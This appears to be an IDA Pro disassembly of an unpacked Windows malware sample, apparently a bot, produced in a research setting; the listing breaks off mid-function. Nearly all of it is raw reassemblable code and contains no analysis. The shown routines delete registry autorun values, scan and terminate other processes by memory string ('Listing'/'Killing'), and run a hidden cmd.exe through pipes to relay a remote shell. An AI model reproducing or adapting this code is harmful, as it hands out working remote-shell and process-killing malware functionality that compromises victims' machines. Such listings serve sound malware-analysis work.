;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 2EF7C1D2683F6B203B5E821BBD6FFDDB
; File Name : u:\work\2ef7c1d2683f6b203b5e821bbd6ffddb_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00016000 ( 90112.)
; Section size in file : 00016000 ( 90112.)
; Offset to raw data for section: 00001000
; Flags E00000A0: Text Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401146+31�p
; sub_401146+43�p ...
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = byte ptr -260h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = byte ptr -218h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 268h
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_40101A
; ---------------------------------------------------------------------------
loc_401013: ; CODE XREF: sub_401000+13C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40101A: ; CODE XREF: sub_401000+11�j
mov eax, [ebp+var_4]
cmp ds:off_418000[eax*4], 0
jz loc_401141
mov eax, [ebp+var_4]
push ds:off_418000[eax*4]
lea eax, [ebp+var_260]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_260]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_110]
push eax
push 3
push 0
lea eax, [ebp+var_260]
push eax
push [ebp+arg_0]
call ds:dword_417008 ; RegOpenKeyExA
and [ebp+var_220], 0
jmp short loc_401081
; ---------------------------------------------------------------------------
loc_401074: ; CODE XREF: sub_401000:loc_40112B�j
mov eax, [ebp+var_220]
inc eax
mov [ebp+var_220], eax
loc_401081: ; CODE XREF: sub_401000+72�j
mov [ebp+var_21C], 104h
mov [ebp+var_224], 104h
lea eax, [ebp+var_224]
push eax
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_114]
push eax
push 0
lea eax, [ebp+var_21C]
push eax
lea eax, [ebp+var_218]
push eax
push [ebp+var_220]
push [ebp+var_110]
call ds:dword_417000 ; RegEnumValueA
mov [ebp+var_264], eax
cmp [ebp+var_264], 0
jz short loc_4010DD
jmp short loc_401130
; ---------------------------------------------------------------------------
loc_4010DD: ; CODE XREF: sub_401000+D9�j
cmp [ebp+var_114], 1
jnz short loc_40112B
push [ebp+arg_4]
push [ebp+var_224]
lea eax, [ebp+var_10C]
push eax
call sub_407ACA
add esp, 0Ch
mov [ebp+var_268], eax
cmp [ebp+var_268], 0
jz short loc_40112B
lea eax, [ebp+var_218]
push eax
push [ebp+var_110]
call ds:dword_417004 ; RegDeleteValueA
test eax, eax
jnz short loc_40112B
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40112B: ; CODE XREF: sub_401000+E4�j
; sub_401000+10B�j ...
jmp loc_401074
; ---------------------------------------------------------------------------
loc_401130: ; CODE XREF: sub_401000+DB�j
push [ebp+var_110]
call ds:dword_417028 ; RegCloseKey
jmp loc_401013
; ---------------------------------------------------------------------------
loc_401141: ; CODE XREF: sub_401000+25�j
mov eax, [ebp+var_8]
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401146 proc near ; CODE XREF: sub_401244+459�p
; sub_40A9CF+A72�p
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push 80h
push [ebp+arg_0]
call ds:dword_4170A8 ; SetFileAttributesA
test eax, eax
jnz short loc_401166
jmp locret_401242
; ---------------------------------------------------------------------------
loc_401166: ; CODE XREF: sub_401146+19�j
push [ebp+arg_0]
call ds:dword_4170AC ; DeleteFileA
push [ebp+arg_0]
push 80000001h
call sub_401000
pop ecx
pop ecx
mov [ebp+var_4], eax
push [ebp+arg_0]
push 80000002h
call sub_401000
pop ecx
pop ecx
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
cmp [ebp+var_4], 0
jnz locret_401242
push 104h
push [ebp+arg_0]
lea eax, [ebp+var_108]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_108]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_10C], eax
jmp short loc_4011DB
; ---------------------------------------------------------------------------
loc_4011CE: ; CODE XREF: sub_401146:loc_40121A�j
mov eax, [ebp+var_10C]
dec eax
mov [ebp+var_10C], eax
loc_4011DB: ; CODE XREF: sub_401146+86�j
cmp [ebp+var_10C], 0
jz short loc_40121C
mov eax, [ebp+arg_0]
add eax, [ebp+var_10C]
movsx eax, byte ptr [eax-1]
cmp eax, 5Ch
jnz short loc_40121A
push 104h
mov eax, [ebp+var_10C]
lea eax, [ebp+eax+var_108]
push eax
lea eax, [ebp+var_108]
push eax
call sub_407A56
add esp, 0Ch
jmp short loc_40121C
; ---------------------------------------------------------------------------
loc_40121A: ; CODE XREF: sub_401146+AE�j
jmp short loc_4011CE
; ---------------------------------------------------------------------------
loc_40121C: ; CODE XREF: sub_401146+9C�j
; sub_401146+D2�j
lea eax, [ebp+var_108]
push eax
push 80000001h
call sub_401000
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
push 80000002h
call sub_401000
pop ecx
pop ecx
locret_401242: ; CODE XREF: sub_401146+1B�j
; sub_401146+56�j
leave
retn
sub_401146 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401244 proc near ; DATA XREF: sub_4017AA+9D�o
var_3E8 = dword ptr -3E8h
var_3E4 = byte ptr -3E4h
var_3E0 = dword ptr -3E0h
var_3DC = dword ptr -3DCh
var_3D8 = dword ptr -3D8h
var_3D4 = dword ptr -3D4h
var_3D0 = dword ptr -3D0h
var_3CC = byte ptr -3CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = byte ptr -2A8h
var_2A7 = dword ptr -2A7h
var_2A3 = byte ptr -2A3h
var_1A3 = byte ptr -1A3h
var_B = byte ptr -0Bh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3E8h
push esi
push edi
push 2ACh
push [ebp+arg_0]
lea eax, [ebp+var_2AC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_40129D
lea eax, [ebp+var_2A3]
push eax
mov eax, [ebp+var_2AC]
push dword ptr [eax]
push offset dword_418144
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 10h
loc_40129D: ; CODE XREF: sub_401244+34�j
call sub_406041
mov [ebp+var_2B4], eax
cmp [ebp+var_2B4], 0
jnz short loc_4012C4
push [ebp+var_2AC]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4017A4
; ---------------------------------------------------------------------------
loc_4012C4: ; CODE XREF: sub_401244+6B�j
push 10000h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_2B8], eax
and [ebp+var_2BC], 0
and [ebp+var_2B0], 0
jmp short loc_4012F2
; ---------------------------------------------------------------------------
loc_4012E5: ; CODE XREF: sub_401244+E2�j
; sub_401244+12B�j ...
mov eax, [ebp+var_2B0]
inc eax
mov [ebp+var_2B0], eax
loc_4012F2: ; CODE XREF: sub_401244+9F�j
mov eax, [ebp+var_2B4]
mov ecx, [ebp+var_2B0]
cmp ecx, [eax]
jge loc_401710
mov esi, [ebp+var_2B0]
imul esi, 114h
mov eax, [ebp+var_2B4]
mov edi, [eax+4]
call ds:dword_4170E8 ; GetCurrentProcessId
cmp [edi+esi], eax
jnz short loc_401328
jmp short loc_4012E5
; ---------------------------------------------------------------------------
loc_401328: ; CODE XREF: sub_401244+E0�j
push 104h
lea eax, [ebp+var_3CC]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
lea eax, [ebp+var_3CC]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_401374
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_401374: ; CODE XREF: sub_401244+129�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push 0
movzx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
add eax, 11h
push eax
call ds:dword_417094 ; OpenProcess
mov [ebp+var_2C4], eax
cmp [ebp+var_2C4], 0
jnz short loc_4013B7
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_4013B7: ; CODE XREF: sub_401244+16C�j
and [ebp+var_2C0], 0
and [ebp+var_2C8], 0
loc_4013C5: ; CODE XREF: sub_401244:loc_4016FA�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+8]
sub eax, [ebp+var_2C0]
cmp eax, 10000h
jbe short loc_4013F7
mov [ebp+var_3E8], 10000h
jmp short loc_40141C
; ---------------------------------------------------------------------------
loc_4013F7: ; CODE XREF: sub_401244+1A5�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+8]
sub eax, [ebp+var_2C0]
mov [ebp+var_3E8], eax
loc_40141C: ; CODE XREF: sub_401244+1B1�j
mov eax, [ebp+var_3E8]
mov [ebp+var_3D0], eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_3D0]
push [ebp+var_2B8]
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+4]
add eax, [ebp+var_2C0]
push eax
push [ebp+var_2C4]
call ds:dword_417098 ; ReadProcessMemory
mov [ebp+var_3D4], eax
cmp [ebp+var_3D4], 0
jz loc_4016C5
cmp [ebp+var_2C8], 0
jz loc_4016C5
and [ebp+var_3D8], 0
and [ebp+var_3DC], 0
loc_401495: ; DATA XREF: UPX1:0041AD00�o
jmp short loc_4014A4
; ---------------------------------------------------------------------------
loc_401497: ; CODE XREF: sub_401244:loc_4015DB�j
mov eax, [ebp+var_3DC]
inc eax
mov [ebp+var_3DC], eax
loc_4014A4: ; CODE XREF: sub_401244:loc_401495�j
mov eax, [ebp+var_2C8]
sub eax, [ebp+var_2A7]
cmp [ebp+var_3DC], eax
ja loc_4015E0
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
cmp eax, ecx
jz short loc_401514
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
add ecx, 20h
cmp eax, ecx
jz short loc_401514
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
sub ecx, 20h
cmp eax, ecx
jnz loc_4015DB
loc_401514: ; CODE XREF: sub_401244+290�j
; sub_401244+2AD�j
mov [ebp+var_3E0], 1
jmp short loc_40152D
; ---------------------------------------------------------------------------
loc_401520: ; CODE XREF: sub_401244:loc_4015D6�j
mov eax, [ebp+var_3E0]
inc eax
mov [ebp+var_3E0], eax
loc_40152D: ; CODE XREF: sub_401244+2DA�j
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
test eax, eax
jnz short loc_401556
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
mov [ebp+var_3D8], eax
jmp loc_40179F
; ---------------------------------------------------------------------------
loc_401556: ; CODE XREF: sub_401244+2F9�j
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
cmp eax, ecx
jz short loc_4015D6
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
add ecx, 20h
cmp eax, ecx
jz short loc_4015D6
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
sub ecx, 20h
cmp eax, ecx
jz short loc_4015D6
jmp short loc_4015DB
; ---------------------------------------------------------------------------
loc_4015D6: ; CODE XREF: sub_401244+338�j
; sub_401244+363�j ...
jmp loc_401520
; ---------------------------------------------------------------------------
loc_4015DB: ; CODE XREF: sub_401244+2CA�j
; sub_401244+390�j
jmp loc_401497
; ---------------------------------------------------------------------------
loc_4015E0: ; CODE XREF: sub_401244+272�j
; sub_401244:loc_40179F�j
cmp [ebp+var_3D8], 0
jz loc_4016C5
mov eax, [ebp+var_2BC]
inc eax
mov [ebp+var_2BC], eax
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_401675
push 3E8h
call ds:dword_41709C ; Sleep
mov al, [ebp+var_B]
mov [ebp+var_3E4], al
and [ebp+var_B], 0
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
lea eax, [ebp+var_2A3]
push eax
push offset dword_41811C
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 14h
mov al, [ebp+var_3E4]
mov [ebp+var_B], al
jmp short loc_4016A3
; ---------------------------------------------------------------------------
loc_401675: ; CODE XREF: sub_401244+3BF�j
push 0
push [ebp+var_2C4]
call ds:dword_4170A0 ; TerminateProcess
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_401146
pop ecx
loc_4016A3: ; CODE XREF: sub_401244+42F�j
mov eax, [ebp+var_2AC]
cmp dword ptr [eax+4], 0
jz short loc_4016C0
push [ebp+var_2C4]
call ds:dword_4170A4 ; CloseHandle
jmp loc_40179A
; ---------------------------------------------------------------------------
loc_4016C0: ; CODE XREF: sub_401244+469�j
jmp loc_401795
; ---------------------------------------------------------------------------
loc_4016C5: ; CODE XREF: sub_401244+230�j
; sub_401244+23D�j ...
mov eax, [ebp+var_2C0]
add eax, [ebp+var_3D0]
mov [ebp+var_2C0], eax
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov edx, [ebp+var_2C0]
cmp edx, [ecx+eax+8]
jnz short loc_4016FA
jmp short loc_4016FF
; ---------------------------------------------------------------------------
loc_4016FA: ; CODE XREF: sub_401244+4B2�j
jmp loc_4013C5
; ---------------------------------------------------------------------------
loc_4016FF: ; CODE XREF: sub_401244+4B4�j
; sub_401244:loc_401795�j
push [ebp+var_2C4]
call ds:dword_4170A4 ; CloseHandle
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_401710: ; CODE XREF: sub_401244+BC�j
; sub_401244:loc_40179A�j
push [ebp+var_2B4]
call sub_40636E
pop ecx
push [ebp+var_2B8]
call sub_416B4C ; free
pop ecx
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_401785
push 3E8h
call ds:dword_41709C ; Sleep
cmp [ebp+var_2BC], 0
jnz short loc_401764
lea eax, [ebp+var_2A3]
push eax
push offset dword_4180F8
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 0Ch
jmp short loc_401785
; ---------------------------------------------------------------------------
loc_401764: ; CODE XREF: sub_401244+501�j
lea eax, [ebp+var_2A3]
push eax
push [ebp+var_2BC]
push offset dword_4180CC
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 10h
loc_401785: ; CODE XREF: sub_401244+4ED�j
; sub_401244+51E�j
push [ebp+var_2AC]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_4017A4
; ---------------------------------------------------------------------------
loc_401795: ; CODE XREF: sub_401244:loc_4016C0�j
jmp loc_4016FF
; ---------------------------------------------------------------------------
loc_40179A: ; CODE XREF: sub_401244+477�j
jmp loc_401710
; ---------------------------------------------------------------------------
loc_40179F: ; CODE XREF: sub_401244+30D�j
jmp loc_4015E0
; ---------------------------------------------------------------------------
loc_4017A4: ; CODE XREF: sub_401244+7B�j
; sub_401244+54F�j
pop edi
pop esi
leave
retn 4
sub_401244 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017AA proc near ; CODE XREF: sub_40A9CF+AA1�p
; sub_40A9CF+AD2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jz short loc_4017C2
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
test eax, eax
jnz short loc_4017C7
loc_4017C2: ; CODE XREF: sub_4017AA+9�j
jmp locret_401854
; ---------------------------------------------------------------------------
loc_4017C7: ; CODE XREF: sub_4017AA+16�j
push 2ACh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4017DD
jmp short locret_401854
; ---------------------------------------------------------------------------
loc_4017DD: ; CODE XREF: sub_4017AA+2F�j
mov eax, [ebp+var_4]
mov cl, [ebp+arg_8]
mov [eax+4], cl
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+5], eax
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 9
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 109h
push eax
call sub_405F67
pop ecx
pop ecx
movzx eax, [ebp+arg_8]
test eax, eax
jz short loc_401830
mov [ebp+var_8], offset aListing ; "Listing"
jmp short loc_401837
; ---------------------------------------------------------------------------
loc_401830: ; CODE XREF: sub_4017AA+7B�j
mov [ebp+var_8], offset aKilling ; "Killing"
loc_401837: ; CODE XREF: sub_4017AA+84�j
push [ebp+arg_4]
push [ebp+var_8]
push offset dword_418174
push 0
push [ebp+var_4]
push offset sub_401244
call sub_4095A4
add esp, 18h
locret_401854: ; CODE XREF: sub_4017AA:loc_4017C2�j
; sub_4017AA+31�j
leave
retn
sub_4017AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401856 proc near ; CODE XREF: sub_401981+A8�p
; sub_401981+E1�p ...
push ebp
mov ebp, esp
cmp ds:dword_41DEF4, 0FFFFFFFFh
jz short loc_40186E
push ds:dword_41DEF4
call ds:dword_4170A4 ; CloseHandle
loc_40186E: ; CODE XREF: sub_401856+A�j
cmp ds:dword_41DEE8, 0FFFFFFFFh
jz short loc_401883
push ds:dword_41DEE8
call ds:dword_4170A4 ; CloseHandle
loc_401883: ; CODE XREF: sub_401856+1F�j
cmp ds:dword_41DEEC, 0FFFFFFFFh
jz short loc_401898
push ds:dword_41DEEC
call ds:dword_4170A4 ; CloseHandle
loc_401898: ; CODE XREF: sub_401856+34�j
cmp ds:dword_41DEF0, 0FFFFFFFFh
jz short loc_4018AD
push ds:dword_41DEF0
call ds:dword_4170A4 ; CloseHandle
loc_4018AD: ; CODE XREF: sub_401856+49�j
pop ebp
retn
sub_401856 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018AF proc near ; CODE XREF: sub_401981+28A�p
; sub_401981+395�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 200h
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+189h]
test eax, eax
jnz short loc_4018D4
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Dh]
test eax, eax
jz short loc_401922
loc_4018D4: ; CODE XREF: sub_4018AF+15�j
; sub_4018AF:loc_401920�j
push 32h
call ds:dword_41709C ; Sleep
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+189h]
test eax, eax
jz short loc_4018FE
call sub_416B64 ; clock
sub eax, ds:dword_41DEFC
cmp eax, 1F4h
jb short loc_4018FE
jmp short loc_401922
; ---------------------------------------------------------------------------
loc_4018FE: ; CODE XREF: sub_4018AF+39�j
; sub_4018AF+4B�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Dh]
test eax, eax
jz short loc_401920
call sub_416B64 ; clock
sub eax, ds:dword_41DEFC
cmp eax, 0FAh
jb short loc_401920
jmp short loc_401922
; ---------------------------------------------------------------------------
loc_401920: ; CODE XREF: sub_4018AF+5B�j
; sub_4018AF+6D�j
jmp short loc_4018D4
; ---------------------------------------------------------------------------
loc_401922: ; CODE XREF: sub_4018AF+23�j
; sub_4018AF+4D�j ...
call sub_416B64 ; clock
mov ds:dword_41DEFC, eax
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_401942
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_401957
loc_401942: ; CODE XREF: sub_4018AF+86�j
push offset dword_4181A4
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
pop ecx
pop ecx
jmp short loc_40196E
; ---------------------------------------------------------------------------
loc_401957: ; CODE XREF: sub_4018AF+91�j
push 200h
push [ebp+arg_4]
lea eax, [ebp+var_200]
push eax
call sub_407A56
add esp, 0Ch
loc_40196E: ; CODE XREF: sub_4018AF+A6�j
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
leave
retn
sub_4018AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401981 proc near ; DATA XREF: sub_401D6E+88�o
var_730 = dword ptr -730h
var_72C = dword ptr -72Ch
var_728 = dword ptr -728h
var_724 = dword ptr -724h
var_720 = dword ptr -720h
var_714 = dword ptr -714h
var_510 = byte ptr -510h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
var_334 = dword ptr -334h
var_330 = word ptr -330h
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = byte ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = byte ptr -30Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 730h
push 3A7h
push [ebp+arg_0]
lea eax, [ebp+var_714]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_416B64 ; clock
sub eax, 1F4h
mov ds:dword_41DEFC, eax
push 0
lea eax, [ebp+var_30C]
push eax
push 104h
push 0
push offset aCmd_exe ; "cmd.exe"
push 0
call ds:dword_41706C ; SearchPathA
test eax, eax
jnz short loc_4019ED
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_4019ED: ; CODE XREF: sub_401981+57�j
mov [ebp+var_318], 0Ch
mov [ebp+var_310], 1
and [ebp+var_314], 0
push 0
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_368]
push eax
lea eax, [ebp+var_364]
push eax
call ds:dword_417070 ; CreatePipe
test eax, eax
jnz short loc_401A41
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401A41: ; CODE XREF: sub_401981+A6�j
push 0
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_36C]
push eax
lea eax, [ebp+var_728]
push eax
call ds:dword_417070 ; CreatePipe
test eax, eax
jnz short loc_401A7A
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401A7A: ; CODE XREF: sub_401981+DF�j
push 3
push 0
push 0
push offset dword_41DEF0
call ds:dword_417074 ; GetCurrentProcess
push eax
push [ebp+var_36C]
call ds:dword_417074 ; GetCurrentProcess
push eax
call ds:dword_4170F0 ; DuplicateHandle
test eax, eax
jnz short loc_401ABB
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401ABB: ; CODE XREF: sub_401981+120�j
push 10h
push 0
lea eax, [ebp+var_724]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 44h
push 0
lea eax, [ebp+var_360]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_360], 44h
mov [ebp+var_334], 101h
and [ebp+var_330], 0
mov eax, [ebp+var_728]
mov [ebp+var_328], eax
mov eax, [ebp+var_368]
mov [ebp+var_324], eax
mov eax, [ebp+var_368]
mov [ebp+var_320], eax
lea eax, [ebp+var_724]
push eax
lea eax, [ebp+var_360]
push eax
push 0
push 0
push 0
push 1
push 0
push 0
push offset byte_41DF00
lea eax, [ebp+var_30C]
push eax
call ds:dword_41707C ; CreateProcessA
test eax, eax
jnz short loc_401B69
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401B69: ; CODE XREF: sub_401981+1CE�j
push [ebp+var_728]
call ds:dword_4170A4 ; CloseHandle
mov eax, [ebp+var_364]
mov ds:dword_41DEF4, eax
mov eax, [ebp+var_36C]
mov ds:dword_41DEE8, eax
mov eax, [ebp+var_724]
mov ds:dword_41DEEC, eax
push [ebp+var_720]
call ds:dword_4170A4 ; CloseHandle
and [ebp+var_4], 0
and [ebp+var_208], 0
loc_401BAD: ; CODE XREF: sub_401981+2E9�j
; sub_401981+39C�j
mov eax, [ebp+var_714]
cmp dword ptr [eax+4], 0
jz short loc_401BBE
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401BBE: ; CODE XREF: sub_401981+236�j
and [ebp+var_208], 0
push 200h
push 0
lea eax, [ebp+var_204]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 0
push 0
lea eax, [ebp+var_4]
push eax
push 200h
lea eax, [ebp+var_204]
push eax
push ds:dword_41DEF4
call ds:dword_417080 ; PeekNamedPipe
test eax, eax
jnz short loc_401C17
push offset aCouldNotReadDa ; "Could not read data from process."
lea eax, [ebp+var_510]
push eax
call sub_4018AF
pop ecx
pop ecx
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401C17: ; CODE XREF: sub_401981+27C�j
cmp [ebp+var_4], 0
jnz short loc_401C6F
mov [ebp+var_730], 103h
lea eax, [ebp+var_730]
push eax
push ds:dword_41DEEC
call ds:dword_417084 ; GetExitCodeProcess
test eax, eax
jz short loc_401C62
cmp [ebp+var_730], 103h
jz short loc_401C62
push offset aCmd_exeProcess ; "Cmd.exe process has terminated."
lea eax, [ebp+var_510]
push eax
call sub_40D53F
pop ecx
pop ecx
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401C62: ; CODE XREF: sub_401981+2BB�j
; sub_401981+2C7�j
push 0Ah
call ds:dword_41709C ; Sleep
jmp loc_401BAD
; ---------------------------------------------------------------------------
loc_401C6F: ; CODE XREF: sub_401981+29A�j
and [ebp+var_72C], 0
jmp short loc_401C85
; ---------------------------------------------------------------------------
loc_401C78: ; CODE XREF: sub_401981:loc_401CAF�j
mov eax, [ebp+var_72C]
inc eax
mov [ebp+var_72C], eax
loc_401C85: ; CODE XREF: sub_401981+2F5�j
mov eax, [ebp+var_72C]
cmp eax, [ebp+var_4]
jnb short loc_401CB1
mov eax, [ebp+var_72C]
movsx eax, [ebp+eax+var_204]
cmp eax, 0Ah
jnz short loc_401CAF
mov [ebp+var_208], 1
jmp short loc_401CB1
; ---------------------------------------------------------------------------
loc_401CAF: ; CODE XREF: sub_401981+320�j
jmp short loc_401C78
; ---------------------------------------------------------------------------
loc_401CB1: ; CODE XREF: sub_401981+30D�j
; sub_401981+32C�j
cmp [ebp+var_208], 0
jz short loc_401CC6
